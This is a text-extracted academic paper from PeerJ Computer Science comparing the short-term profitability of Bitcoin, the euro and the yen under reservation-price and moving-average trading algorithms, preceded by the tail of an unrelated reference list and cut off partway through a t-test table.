Proceedings of IEEE International Symposium on Circuits and Systems. [5] Sadra Hemmati, Eric Wade (2016). Detecting postural transitions: A robust wavelet-based approach. Proceeding of IEEE 38th Annual International Conference of the Engineering in Medicine and Biology Society (EMBC), pp. 3704-3707. [6] S. G. Bagul, R.K.Shastri (2013). Text Independent Speaker Recognition System Using GMM. International Conference on Human Computer Interactions (ICHCI), pp 1 - 5. [7] Manal Abdel Wahed (2014). Computer aided recognition of pathological voice. 31st National Radio Science Conference (NRSC), pp. 349 – 354. [8] H B Kekre, V A Bharadi, A R Sawant, Onkar Kadam, Pushkar Lanke, Rohit Lodhiya (2012). Speaker recognition using Vector Quantization by MFCC and KMCG clustering algorithm. International Conference on Communication, Information and Computing Technology ( ICCICT ). [9] Tyagi and C. Wellekens (2005). On desensitizing the Mel-Cepstrum to spurious spectral components for robust speech recognition. In proceeding of IEEE International Conference on Acoustics, Speech and Signal Processing, Vol. 1, pp. 529-532. [10] Saqui Z., Salam N., Nair N., Pandey N. (2011) Voiceprint recognition system for remote authentication survey. International Journal of Hybrid Information Technology, Vol. 4, No.2. [11] Sunil A., Shruti A., Rama C. (2010) Prosodic Feature Based Text Dependent Speaker Recognition Using Machine Learning Algorithms. International Journal of Engineering Science and Technology, Vol. 2 No.10, Pp. 5150-5157. [12] Kirti A., and Minakshee P., (2013). Speech and speaker identification for password verification system. International Journal of Advanced Research in Electrical,Electronic and Instrumentation, Vol. 2, Issue 6. [13] Parrul, R., Dubey, B., (2012). Automatic speaker recognition system. International Journal of Advanced Computer Research, Vol. 2, No.4. [14] Wikipedia. (2003). CPU power dissipation. (http://en.wikipedia.org/wiki/CPU-power-dissipation) work_d4oifelki5bajaka556kgxluoa ---- Submitted 10 September 2020 Accepted 25 November 2020 Published 3 February 2021 Corresponding author Iftikhar Ahmad, ia@uetpeshawar.edu.pk Academic editor Ana Reyes-Menendez Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.337 Copyright 2021 Ahmad et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Using algorithmic trading to analyze short term profitability of Bitcoin Iftikhar Ahmad1, Muhammad Ovais Ahmad2,3, Mohammed A. Alqarni5, Abdulwahab Ali Almazroi4 and Muhammad Imran Khan Khalil1 1 Department of Computer Science and Information Technology, University of Engineering & Technology Peshawar, Peshawar, Pakistan 2 Department of Mathematics and Computer Science, Karlstad University, Karlstad, Sweden 3 M3S Research Unit, University of Oulu, Oulu, Finland 4 University of Jeddah, College of Computing and Information Technology at Khulais, Department of Infor- mation Technology, Jeddah, Saudi Arabia 5 University of Jeddah, College of Computer Science and Engineering, Department of Software Engineering, Jeddah, Saudi Arabia ABSTRACT Cryptocurrencies such as Bitcoin (BTC) have seen a surge in value in the recent past and appeared as a useful investment opportunity for traders. However, their short term profitability using algorithmic trading strategies remains unanswered. In this work, we focus on the short term profitability of BTC against the euro and the yen for an eight- year period using seven trading algorithms over trading periods of length 15 and 30 days. We use the classical buy and hold (BH) as a benchmark strategy. Rather surprisingly, we found that on average, the yen is more profitable than BTC and the euro; however the answer also depends on the choice of algorithm. Reservation price algorithms result in 7.5% and 10% of average returns over 15 and 30 days respectively which is the highest for all the algorithms for the three assets. For BTC, all algorithms outperform the BH strategy. We also analyze the effect of transaction fee on the profitability of algorithms for BTC and observe that for trading period of length 15 no trading strategy is profitable for BTC. For trading period of length 30, only two strategies are profitable. Subjects Algorithms and Analysis of Algorithms, Data Science Keywords Algorithmic trading, Bitcoin, Cryptocurrencies INTRODUCTION Cryptocurrencies have seen a surge in the recent past. Researchers and investors alike have focused on the growth and evolution of cryptocurrencies like Bitcoin (BTC), Etherum, and Litecoin etc. Moore (2013) attributed three main factors that contributed towards the rise and adaptation of bitcoins. First, higher profit margins, maintained by credit card agencies for using their platforms has resulted in dis-satisfied customers. The customers are thus lured to use BTC, which promises extremely low transaction fee. Second, the anonymity that is offered by the bitcoins. Bitcoins offer the possibility of conducting transactions using pseudonyms and thus omitting the need of using real names. Third is the decentralization of the bitcoin that protects against inflation. Over time, BTC has become one of the choice currencies for online payment and beside others is accepted by tech-giants like Amazon, Apple, Microsoft, and Paypal etc. The introduction of cryptocurrencies provided a new How to cite this article Ahmad I, Ahmad MO, Alqarni MA, Almazroi AA, Khalil MIK. 2021. Using algorithmic trading to analyze short term profitability of Bitcoin. PeerJ Comput. Sci. 7:e337 http://doi.org/10.7717/peerj-cs.337 https://peerj.com/computer-science mailto:ia@uetpeshawar.edu.pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.337 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.337 investment domain for the investors, and became a credible investment vehicle (Brière, Oosterlinck & Szafarz, 2015). Bitcoin was introduced by Satoshi Nakamoto in 2008 (Nakamoto, 2008). The inventor Satoshi Nakamoto is a pseudonym and the real identity of the person is not known to the world. Bitcoin is a digital currency, i.e., unlike fiat currencies such as dollar, and Euro etc., it does not have any physical denomination, and is present only in digital form. Beside similarities, such as the price regulation based on demand and supply, there are some key differences between fiat and crypto currencies like BTC. For instance, BTC has no centralized authority (like the Federal Reserve) that controls the supply, i.e., BTC and by extension all cryptocurrencies are decentralized by nature. The value of a fiat currency is generally dependent on factors such as inflation rate in a country, the interest rates, balance between import and export and monetary policy. In contrast, the value of BTC can be determined by several factors such as transactional demand, media speculation, buzz around the technology, and acceptability etc (Nguyen, de Bodisco & Thaver, 2018; Wang & Vergne, 2017). Other differentiating aspects include legality, tangibility, and storage. The underlying technology of BTC is blockchain. In its simplest form, a blockchain is a distributed append-only ledger formed by the collection of blocks. The append-only nature of the ledger means that transactions once recorded are tempered-proof and cannot be changed/modified in any form. This property is achieved with the help of cryptographic hash functions (Narayanan et al., 2016). The Bitcoin eco-system is based on peer-to-peer network where a large number of computational nodes are connected (not necessarily directly). The peer-to-peer network omits the need of centralized system, instead it uses the concept of ‘‘proof-of-work’’ to validate transactions. For a detailed description of BTC, its underlying technology and applications, the reader is referred to Narayanan et al. (2016). Algorithmic trading is an important tool used by investors in financial trading markets (Ahmad & Schmidt, 2012). It facilitates investors in investing their wealth in various assets (currencies, bonds, stock shares etc.) by automating the decision making process. A number of algorithms are proposed in the literature for algorithmic trading (Iqbal & Ahmad, 2015; Mohr, Ahmad & Schmidt, 2014; Ahmad & Schmidt, 2012; El-Yaniv et al., 2001). The problem is addressed in a wide variety of domains including computer science (Kao & Tate, 1999; El-Yaniv et al., 2001; Mohr, Ahmad & Schmidt, 2014), operations research (Schroeder, Dochow & Schmidt, 2018), economics and finance (Coakley, Marzano & Nankervis, 2016; Hsu, Hsu & Kuan, 2010). These algorithms are based on various assumptions and are designed to optimize a variety of objective functions such as minimizing competitive ratio (Mohr, Ahmad & Schmidt, 2014). Algorithmic trading and technical analysis are also important tools to investigate the market behavior and assess its profitability in the short and long term scenarios (Ahmad & Schmidt, 2012; Coakley, Marzano & Nankervis, 2016). Despite the debate in the literature questioning the effectiveness of technical analysis, there is a plethora of research work based on technical analysis (Coakley, Marzano & Nankervis, 2016; Hsu, Hsu & Kuan, 2010; Menkhoff & Taylor, 2007). The variety of studies validated the usefulness of technical analysis and its wide spread applicability. However, to the best of our knowledge, there is no work to evaluate the short term profitability of BTC using algorithmic trading Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 2/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 and technical analysis. We investigate the short term profitability of BTC against two other major currencies euro and yen. More specifically, we consider daily exchange rates of dollar–BTC, dollar–euro, and dollar-yen from 1st Jan 2011 to 31st Dec 2018. We investigate the short term profitability (15 and 30 days) as it is a common observation that in the long term BTC has observed significant price movement and is highly profitable. We consider two categories of algorithms namely reservation price algorithms and moving average based algorithms and consider buy and hold as a benchmark strategy. Our findings are based on the geometric average period return, the effect of transaction fee, the number of buy and sell transactions, the number of completed transactions, and the number of profitable vs. non-profitable transactions. Using buy and hold strategy as our benchmark, we compare the geometric average period returns of the seven strategies with buy and hold. Rather surprisingly, we found that in short term the yen is more profitable than BTC and euro; however the answer also depends on the choice of algorithm. Reservation price algorithms result in 7.5% and 10% of average returns over 15 and 30 days respectively, which is the highest for all algorithms for the three assets. For BTC, all algorithms outperform the BH strategy. After introducing a transaction fee of 4%, we observe that for the trading period of length 15 no trading strategy is profitable for BTC, whereas for trading period of length 30, only two strategies are profitable. It is important to mention that we do not consider machine learning techniques but instead focus on algorithmic trading strategies which do not rely on past trends and patterns, thus do not need future to follow the patterns of the past. Machine learning based algorithms are presented in the literature, the reader is referred to Uras et al. (2020), Alessandretti et al. (2018) and Zbikowski (2016) Rest of the paper is organized as follows; In ‘Literature Review’, we briefly present literature review on the use of experimental evaluation of trading algorithms. In ‘Research Questions and Data Set’, we present a set of research questions and the methodology for the extraction of data set. In ‘Experimental Setup and Methodology’, we describe the set of algorithms, followed by the description of the evaluation criterion. Results are presented in ‘Results and Discussions’, whereas ‘Conclusion’ presents conclusion, and directions for future work. LITERATURE REVIEW Experimental evaluation of trading strategies is an established area of research in Computer Science (Iqbal, Ahmad & Schmidt, 2012; Ahmad & Schmidt, 2012; Mohr, Ahmad & Schmidt, 2014), and Computational Finance (Brock, Lakonishok & LeBaron, 1992; Coakley, Marzano & Nankervis, 2016). Ever since the seminal work of Brock, Lakonishok & LeBaron (1992) there is a considerable literature devoted to the study of algorithmic trading strategies. The strategies are investigated from different perspectives and for various markets around the world. In the following, we present a brief literature review of the work based on experimental analysis of trading algorithms. Iqbal, Ahmad & Schmidt (2012) performed an experimental evaluation of DAX30 to answer the question ‘‘Can online trading algorithms beat the market?’’. The authors Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 3/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 considered a number of trading algorithms, and compared their performance with classical buy and hold (BH) algorithm over trading periods of various length. They concluded that trading algorithms can beat the market, i.e., a trading algorithm can achieve a better return (profit) than BH algorithm. Ahmad & Schmidt (2012) presented an extensive experimental evaluation of trading algorithms for uni-directional conversion problem (see Mohr, Ahmad & Schmidt (2014) for a definition of uni-directional conversion problem). The authors considered two data sets DAX30 and S&P500 over a period of 10 years (2001–2010, and compared the performance of various algorithms using average competitive ratio. Unlike, Iqbal, Ahmad & Schmidt (2012), Ahmad & Schmidt (2012) used bootstrapping to avoid data snooping bias. Coakley, Marzano & Nankervis (2016) performed a comprehensive analysis of various trading rules for 22 currencies over a period of 19 years. Authors reported evidence of profitability for rules based on classical moving average as well as rules based on Bollinger bands and relative strength index. Jiang, Tong & Song (2019) investigated the profitability of trading rules in Chinese stock market. The authors used 19 years daily data from Chinese aggregate market return and confirmed the profitability of trading rules even in the presence of transaction costs. Strobel & Auer (2018) analyzed the diminishing predictive power of fundamental variables and seasonal effects over time. They considered Variable Length Moving Average (VLMA) rules introduced by Brock, Lakonishok & LeBaron (1992), and using data set covering 1972 to 2015 concluded that VLMA rules have lost the predictive ability. Chang, Jong & Wang (2017) used VLMA rules to Taiwanese Stock Exchange (TWSE) and computed excess returns to buy and hold (BH) strategy. The objective of the work was to evaluate the effectiveness of VLMA rules against BH. The results confirmed the superiority of VLMA rules against BH. The novelty of the work lies in the application of VLMA rules to all individual stock listed on TWSE. Hsu, Taylor & Wang (2016) investigated the profitability of technical trading rules in the forex market by analyzing 30 currencies over a period of 45 years. It is argued that there is a significant evidence of the profitability of technical trading rules for some periods. Likewise, the profitability variations are consistent with the adaptive market hypothesis. Fang, Jacobsen & Qin (2014) used the technical trading rules of Brock, Lakonishok & LeBaron (1992) and out-of-sample tests based on fresh data. They inferred that there is no conclusive evidence to support the predictive ability of these strategies. However, they attributed the lack of predictive ability to potential bias rather than efficient market hypothesis. Despite the plethora of work dedicated to analyze the profitability of various trading strategies and markets, to the best of our knowledge there is no work that compares the profitability of Bitcoin with various other currencies, and to evaluate the performance of various algorithms on Bitcoin. RESEARCH QUESTIONS AND DATA SET Research questions We formulate a set of research questions (RQ), which essentially provide a base for the data analysis. The main objectives of the research questions are to identify the most profitable Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 4/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 asset, the most appropriate (profitable) algorithm for various assets, and to analyze the effect of transaction cost on the profitability of various algorithms. RQ 1. Which asset is the most profitable in terms of geometric average period returns? RQ 2. Which strategy is the most profitable for each of the assets? RQ 3. How the number of buy and sell signals vary for BTC? RQ 4. What are the number of positive and negative returned transactions for BTC? RQ 5. How the transaction fee effects the profitability of algorithms? Note that the research questions are not arbitrarily but are instead rooted in the literature. For instance, RQ1 is based on Hsu, Taylor & Wang (2016) who used Japanese yen, German mark/euro, U.K. pound, and Swiss franc as base currency in their study and evaluated the profitability of technical trading rules. Likewise, RQ2 is variant of research question posed in Abbey & Doukas (2012). In Abbey & Doukas (2012) the authors examined if technical trading rules can be profitable for individual traders. In the similar manner, RQ5 is studied by a number of researchers including Hsu, Taylor & Wang (2016) and Ahmad & Schmidt (2012). Data We consider the daily closing prices of the following currencies against dollar; i Bitcoin (BTC) ii Euro iii Yen A single data point represents the amount of currency that can be purchased by spending 1 US. The BTC data is obtained from coindesk website (http://www.coindesk.com) for a period of 8 years starting from 1 Jan 2011 to 31 Dec 2018. The main reason for the selection of the data set is based on the availability of the data. On many websites such as coindesk, USD-BTC data is only available from 18 July 2010, therefore, we select the starting date to be 1 Jan 2011, and in the process data set consists of complete 8 years. Euro and yen data is obtained from Yahoo! Finance (http://finance.yahoo.com). Table 1 reports various statistics for the data. For the sake of comparison, we take a holistic view of the whole data set by reporting the statistics for the 8 years (1 Jan 2011–31 Dec 2018). EXPERIMENTAL SETUP AND METHODOLOGY Trading algorithms A variety of trading algorithms are proposed in the literature (Mohr, Ahmad & Schmidt, 2014; Coakley, Marzano & Nankervis, 2016). In the following we describe a selected set of algorithms that are used in our study. The motivation behind the selection of the algorithms from the literature is rooted in the performance of the algorithms. Studies (Ahmad & Schmidt, 2012; Iqbal, Ahmad & Schmidt, 2012; Iqbal, Ahmad & Shah, 2019) have shown that reservation algorithm of El-Yaniv et al. (2001) and Iqbal, Ahmad & Shah (2019) are the best performing algorithms. Further, in order to make the comparison meaningful, two widely used techniques from finance namely variable length moving average, and fixed length moving average are also considered. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 5/19 https://peerj.com http://www.coindesk.com) http://finance.yahoo.com http://dx.doi.org/10.7717/peerj-cs.337 Table 1 Summary Statistics of the Dataset, σ =Standard Deviation, γ =Skewness, K =Kurtosis, ρ(k)=kth order correlation. Asset Bitcoin Euro Yen Observations 2921 2086 2086 Minimum 0.0000517 0.674 75.82 Maximum 3.448 0.817 125.62 Mean 0.099 0.818 101.94 σ 0.345 0.075 14.62 γ 6.234 0.0703 −0.475 Std Error of γ 0.0452 0.0535 0.0535 K 45.178 −1.327 −1.069 Std Error of K 0.0905 0.1071 0.1071 ρ(1) 0.9984 2.9856 375.7 ρ(2) 0.9969 2.9820 375.2 ρ(3) 0.9953 2.9785 374.7 ρ(4) 0.9937 2.9752 374.3 ρ(5) 0.9922 2.9790 373.8 ρ(6) 0.9906 2.9684 373.4 ρ(7) 0.9890 2.9651 372.9 Reservation price algorithms Reservation price algorithm calculates a threshold price and generates a buy signal when the offered exchange rate is less than or equal to the threshold. A sell signal is generated when the price is at least threshold (Iqbal, Ahmad & Schmidt, 2012; Iqbal, Ahmad & Shah, 2019; Kao & Tate, 1999). A number of reservation price algorithms are presented in the literature (Mohr, Ahmad & Schmidt, 2014; Kao & Tate, 1999; Iqbal, Ahmad & Shah, 2019; El-Yaniv et al., 2001). In the following we present the selected set of reservation price algorithms considered for our study. El-Yaniv et al. (2001) assumed a priori information about the lower (minimum possible price m) and upper (maximum possible price M) bound of prices, and presented a reservation price algorithm. Let et be the current exchange price. Algorithm 1 provides formal description for El-Yaniv reservation price algorithm for generating buy and sell signals respectively. Iqbal, Ahmad & Shah (2019) presented a modified version of the reservation price policy of El-Yaniv et al. (2001). The authors critiqued the assumption of fixed values of m and M and argued that inter-day price fluctuation is not arbitrary but is instead governed by inter-day price fluctuation function as shown in Eq (1). (1−γ)et−1≤et ≤(1+γ)et−1 (1) Note that et is the exchange rate offered on day t, and γ ∈0,1. The formal description of algorithm is given in Algorithm 2. For detailed working of the algorithm, the reader is referred to Iqbal, Ahmad & Shah (2019). Kao & Tate (1999) presented a reservation price algorithm based on the perceived rank of the offered exchange rate. The perceived exchange rank is calculated based on the current Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 6/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 Algorithm 1 Reservation Price Algorithm (RP) Require: et,m,M 1: Calculate reservation price e∗= √ Mm 2: if et ≤e∗ then 3: Generate a buy signal 4: end if 5: if et >e∗ then 6: Generate a sell signal 7: end if 8: Generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. Algorithm 2 Reservation Price Algorithm RP∗ Require: m, M,γ,T 1: Set m0=m,M0=M 2: for t=1 to T do 3: A new exchange rate et is observed. 4: Compute achievable lower bound mt : mt =max{mt−1,et (1−γ)T−t} 5: Compute achievable upper bound Mt : Mt =min{Mt−1,et (1+γ)T−t} 6: Calculate new reservation price e∗t = √ mt Mt 7: if et ≤e∗t then 8: Generate a buy signal 9: end if 10: if et >e∗t then 11: Generate a sell signal 12: end if 13: end for 14: Generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. rank xt of the offered exchange rate et in all the exchange prices observed so far. The formal algorithm is presented in Algorithm 3. T represents the number of days in a trading period, LT (t) and HT (t) are the thresholds for buy and sell signals respectively and are computed as shown in Eqs. (2) and (4) respectively; LT (t)=   0 : t =T⌊ t+1 T+1 (RT (t+1)−PT (T+1)) ⌋ : t <T (2) Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 7/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 Algorithm 3 Reservation Price Algorithm (KT) Require: et,LT (t),HT (t) Calculate LT (t) Calculate HT (t) Generate a buy signal at exchange rate et if xt ≤LT (t) Generate a sell signal at exchange rate et if xt ≥HT (t) Generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. Note that PT (t) is the expected difference between the buy and sell prices if the optimal strategy is followed at t, and is calculated as shown in Eq. (3). PT (t)=   0 : t =T PT (t+1)+ LT (t) t ( RT (t+1)−PT (t+1)− T+1 t+1 LT (t)+1 2 ) : t <T (3) HT (t)= ⌈ t+1 T+1 RT (t+1) ⌉ (4) Note that RT is the expected final rank of et for selling, if an optimal strategy is followed starting from time t, and is calculated as given in Eq. (5). RT (t)= HT (t)−1 t ( Rt (t+1)− T+1 2(t+1) HT (t) ) + T+1 2 . (5) Moving average based rules Moving average (MA) rule is the simplest and popular technical analysis trading rule. The basic idea of MA based rules is to generate buy and sell signals based on the short vs long-term moving averages. More specifically, a buy signal is generated when the short term moving average cuts the long term moving average from below. On the contrary, a sell signal is generated when the short-term moving average cuts the long-term moving average from above. However, in a market the crossing between short-term and long-term moving averages can occur on multiple instances in a short period, resulting in a large number of buy and sell signals (Zhu et al., 2015). The resulting large number of signals are hardly profitable and can force a large transaction fee as well. To avoid this, a minimum threshold called band is introduced. The band introduces a specific percentage difference between the short and long term moving averages in order to generate buy and sell signals. In the literature two variants of the moving averages, called Variable Length Moving Average (VLMA) and Fixed Length Moving Average (FLMA) are used (Brock, Lakonishok & LeBaron, 1992; Gunasekarage & Power, 2001; Zhu et al., 2015). Let AS be the short term moving average, AL be the long term moving average, and B the band value. Algorithm 4 describes variable length moving average strategy for buy and sell signals. In VLMA a buy signal is generated when the short term moving average cuts the long term moving average (taking into account the band value) from below, i.e., AS >(1+B)AL. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 8/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 Algorithm 4 Variable Length Moving Average Algorithm Require: AS,AL,B 1: if AS >(1+B)AL then 2: Generate a buy Signal 3: end if 4: if AS <(1−B)AL then 5: Generate a sell signal 6: end if 7: Generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. Likewise, VLMA generates a sell signal when AS < (1−B)AL. A rule is represented by the combination of three values S (length of short-term moving average), L (length of long-term moving average), B (band). For instance, VLMA(5,30,0.02) represents a rule where short term average is taken over a period of 5 days, long term over a period of 30 days, and the band value is 2%. FLMA works on the same principle as stated in Algorithm 4. However, FLMA differs from the VLMA by introducing a holding period, i.e., once a signal is generated then the position must be held for a fixed number of days. Any signal generated during the holding period is ignored. Buy and hold strategy Buy and hold (BH) is widely used in the literature as a benchmark strategy (Mohr, Ahmad & Schmidt, 2014; Chang, Jong & Wang, 2017; Baur et al., 2018), and is therefore used in our study as well. In BH an investor executes the buy transaction on the first day of the investment period and holds the position until the last day T . On the last day, a sell transaction is executed to complete the trading. The formal description of buy and sell signals of BH algorithm is given in Algorithm 5. Algorithm 5 Buy and Hold (BH) Require: e1,eT 1: Buy on the first offered exchange rate e1 2: Sell on the last offered exchange rate eT We test the profitability of the algorithms for various parameters and for various durations. We consider short term moving averages over 5 and 10 days, long term moving averages over 15, and 30 days, and band values 0.01 and 0.02 (Brock, Lakonishok & LeBaron, 1992; Fang, Jacobsen & Qin, 2014). Thus we produce a total of 8 trading rules, 4 each for VLMA and FLMA. Likewise, we consider 15 and 30 days durations for Algorithms 1, 2, 3 and 5. Thus we have a total of 16 variants of algorithms to evaluate. Table 2 presents a summary of the selected algorithms and their variants. Evaluation criterion We use Geometric Average Trading Period Return (GPR) as our evaluation criterion. GPR is used as an evaluation criterion in a number of works such as Schmidt, Mohr & Kersch Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 9/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 Table 2 Summary of the selected algorithms and their variants. S.No Algorithm Description 1 VLMA(5,15,0.01) VLMA algorithm with S,L,B values as 5,15,0.01 2 VLMA(5,15,0.02) VLMA algorithm with S,L,B values as 5,15,0.02 3 FLMA(5,15,0.01) FLMA algorithm with S,L,B values as 5,15,0.01 4 FLMA(5,15,0.02) FLMA algorithm with S,L,B values as 5,15,0.02 5 RP(15) Reservation price algorithm (RP) (El-Yaniv et al., 2001) applied over 15 days 6 RP∗(15) Update reservation price algorithm (RP∗) (Iqbal, Ahmad & Shah, 2019) applied over 15 days 7 KT(15) Reservation price algorithm (KT) (Kao & Tate, 1999) applied over 15 days 8 BH(15) Buy and Hold algorithm applied over 15 days 9 VLMA(10,30,0.01) VLMA algorithm with S,L,B values as 10,30,0.01 10 VLMA(10,30,0.02) VLMA algorithm with S,L,B values as 10,30,0.02 11 FLMA(10,30,0.01) FLMA algorithm with S,L,B values as 10,30,0.01 12 FLMA(10,30,0.02) FLMA algorithm with S,L,B values as 10,30,0.02 13 RP(30) Reservation price algorithm (RP) (El-Yaniv et al., 2001) applied over 30 days 14 RP∗(30) Update reservation price algorithm (RP∗) (Iqbal, Ahmad & Shah, 2019) applied over 30 days 15 KT(30) Reservation price algorithm (KT) (Kao & Tate, 1999) applied over 30 days 16 BH(30) Buy and Hold algorithm applied over 30 days (2010) and Iqbal, Ahmad & Schmidt (2012). Let Dj0 be the initial amount of dollars at the start of a trading period j, and DjT be the final amount of dollars at the end of the trading period j. Let, rj be the return of the jth trading period, then rj =D j T/D j 0. Assuming that there are P trading periods (or trades), we define the geometric average trading period return GPR(P) as; GPR(P)= ( P∏ i=1 ri )1/P (6) Initially we do not consider any transaction fee and report our findings based on zero transaction fee. In ‘How the transaction fee effect the profitablity of algorithms?’, we assess the impact of the transaction fee on the returns by introducing various values of transaction fees. The transaction fees are based on coinbase—one of the popular online services dealing in buying, selling and storage of bitcoins. Coinbase charges a minimum of 1.49% transaction fee on all transactions. However, the exact value varies based on the mode of payment. For instance, for payment via credit card the transaction fee is 3.99%. We consider a set of transaction fees TF ={0,2.0,4.0}. We compare the geometric average period returns of the 16 strategies (see Table 2). It is also important to mention that returns are only calculated for trading periods when at least one buy transaction is followed by a sell transaction. For situations, where only buy or only sell signals are generated, no returns are taken into account. Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 10/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 Table 3 Geometric average trading period returns (GPR) of trading strategies. Strategy Bitcoin Euro Yen VLMA(5,15,0.01) 1.021 1.007 1.003 VLMA(5,15,0.02) 1.015 1.043 1.095 FLMA(5,15,0.01) 0.986 1.007 1.005 FLMA(5,15,0.02) 1.007 1.04 1.095 RP(15) 1.062 1.009 1.01 RP∗(15) 1.075 1.01 1.011 KT(15) 0.962 1.001 1.001 BH(15) 0.953 1.0 1.002 VLMA(10,30,0.01) 1.033 1.005 1.018 VLMA(10,30,0.02) 1.041 1.021 1.095 FLMA(10,30,0.01) 1.032 1.005 1.018 FLMA(10,30,0.02) 1.039 1.02 1.095 RP(30) 1.089 1.013 1.014 RP∗(30) 1.101 1.014 1.014 KT(30) 0.929 1.0 0.998 BH(30) 0.909 1.001 1.004 Average GPR 1.016 1.012 1.03 RESULTS AND DISCUSSIONS In the following, we present our results from various perspectives such as the geometric average trading period returns, the number of buy/sell signals generated and the impact of the transaction fee. Which asset is the most profitable in terms of geometric average period return? We calculate geometric average trading period return for each trading rule based on Eq. (6) and report our findings as shown in Table 3. It must be noted that we do not consider any transaction fee in this case. The effect of the transaction fee is discussed later in ‘How the transaction fee effect the profitablity of algorithms?’ It can be seen from the resultant table that the average GPR of the selected assets are 1.016, 1.012, and 1.03 for BTC, Euro and Yen respectively. Although the difference between GPR is not significant, Yen achieved a higher return than BTC, and Euro. A further analysis of the data reflects that the returns are strategy dependent as well. For instance, RP∗(30) achieved an GPR of 1.101 over BTC which is the highest returns among all the assets/strategies. Another interesting observation is the number of resultant positive and negative returns. Note that an GPR of at least 1 is termed as a positive return. For BTC, out of 16 strategies, 11 are positive. For Euro and Yen, the corresponding number of positive returns strategies are 16 and 15 respectively. Comparing the performance of reservation price algorithms (RP, RP∗, KT), and moving average based strategies (VLMA, FLMA) with BH, we found that for BTC, the returns of all algorithms are superior than corresponding BH strategies. The same trend is observed Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 11/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 Table 4 Highest GPR achieved for the assets. Asset Trading period GPR Algorithm BTC 15 1.075 RP∗ BTC 30 1.101 RP∗ Euro 15 1.432 VLMA(5,15,0.02) Euro 30 1.021 VLMA(10,30,0.02) Yen 15 1.0953 FLMA(5,15,0.02) Yen 30 1.00952 FLMA(10,30,0.02) for Euro except for KT(30) which is inferior to BH(30). All algorithms outperform BH on Yen as well, except KT . Which strategy is the most profitable for each of the assets? To answer the question, we analyze Table 3, and identify the best performing algorithm for each asset. We also consider the trading period length, and summarize the results in Table 4. We observed that RP∗ is the best algorithm for BTC achieving a GPR of 1.075 and 1.101 for trading period of length 15 and 30 respectively. For Euro, the corresponding algorithms are VLMA(5,15,0.02) and VLMA(10,30,0.02) resulting in an average GPR of 1.0432 and 1.021 respectively. FLMA(5,15,0.02) and FLMA(10,30,0.02) are the best performing algorithms for Yen with average GPR of 1.0953 and 1.0952 respectively. It is interesting to note that for each asset, a unique algorithm is adjudicated as the best performing algorithm. Further, analysis reveals that KT and BH are the worst performing algorithms for all the three data sets. For BTC, the two algorithms’ returns are negative (<1). For Euro, the returns of KT and BH are positive (though worst among all), and for Yen the returns are positive except for KT(30) which is marginally less than 1. On average, VLMA(10,30,0.2) is the best performing algorithm over all asset by achieving an average GPR of 1.052 which is closely followed by FLMA(10,30,0.02). It is interesting to point out that although RP and RP∗ assumes apriori information about the lower and upper bounds of future exchange rates, their average performance is inferior to that of VLMA and FLMA. In order to ensure that the performance of algorithms on BTC is not an anomaly, a statistical t-test (paired sample t-test) was performed with confidence level of 95% (p≤0.05). The tests were performed on the returns of algorithms for BTC considering 15 and 30 days trading duration. Tables 5 and 6 summarizes the results of paired t-test for the returns of BTC on various algorithms for 15 and 30 days trading periods. Recall from Table 3 that RP∗ is the best performing algorithm for BTC. Table 5 confirms that with 95% confidence the improved performance of RP∗ over all algorithms (except VLMA(5,15,0.02), and FLMA(5,15,0.02)) is not by chance. For VLMA(5,15,0.02), and FLMA(5,15,0.02) the confidence level is still significant ( 93% and 94%). Other than RP∗, and RP no other algorithm exhibits a significant confidence in the returns over BTC. However, except for FLMA(5,15,0.01) and KT(15) all other algorithms have shown the potential to beat the market, i.e., the returns are better (and statistically significant) than BH strategy. For 30 days trading period, the returns of moving average based strategies Ahmad et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.337 12/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.337 Table 5 Paired sample t-test for the returns of BTC with confidence interval of 95% (15 days trading period). Algorithms VLMA(5,15,0.02) FLMA(5,15,0.01) FLMA(5,15,0.02) RP(15) RP∗(15) KT(15) BH(15) VLMA(5,15,0.01) 0.857 0.419 0.982 0.07 0.026 0.083 0.023 VLMA(5,15,0.02) – 0.317 0.848 0.145 0.072 0.053 0.012 FLMA(5,15,0.01) – – 0.346 0.037 0.015 0.338 0.175 FLMA(5,15,0.02) – – – 0.127 0.061 0.089 0.041 RP(15) – – – – 0 0 0 RP∗(15) – – – – – 0 0 KT(15) – – – – – – 0.944 Table 6 Paired sample t-test for the returns of BTC with confidence interval of 95% (30 days trading period). Algorithms VLMA(10,30,0.02) FLMA(10,30,0.01) FLMA(10,30,0.02) RP(30) RP∗(30) KT(30) BH(30) VLMA(10,30,0.01) 0.541 0.425 0.574 0.559 0.393 0.054 